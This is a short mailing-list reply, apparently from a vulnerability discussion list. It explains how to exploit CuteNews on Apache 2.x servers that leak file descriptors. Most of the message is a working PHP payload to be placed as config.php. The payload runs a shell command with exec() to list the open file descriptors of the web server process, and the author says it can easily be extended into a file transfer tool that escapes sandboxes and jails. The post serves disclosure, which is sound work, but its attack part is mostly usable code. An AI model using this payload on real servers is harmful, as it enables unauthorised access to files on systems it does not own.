In-Reply-To: <E18ndJT-000JS2-00@f19.mail.ru> Hello, If the cutenews website is running apache 2.x which leaks descriptors to all kinds of things http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2 Then you can do this: config.php = <html><head><title>File List</title></head> <body> <?php $cmd = "/bin/ls -l /proc/$$/fd"; exec($cmd, $dir_listing, $status); foreach($dir_listing as $item) { $match = preg_split("/> /", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "<br>"; } } } ?> </body></html> it doesn't take alot more to make this a fully clickable file transfer utility that Sandboxes or Jails cannot protect. -Steve Grubb
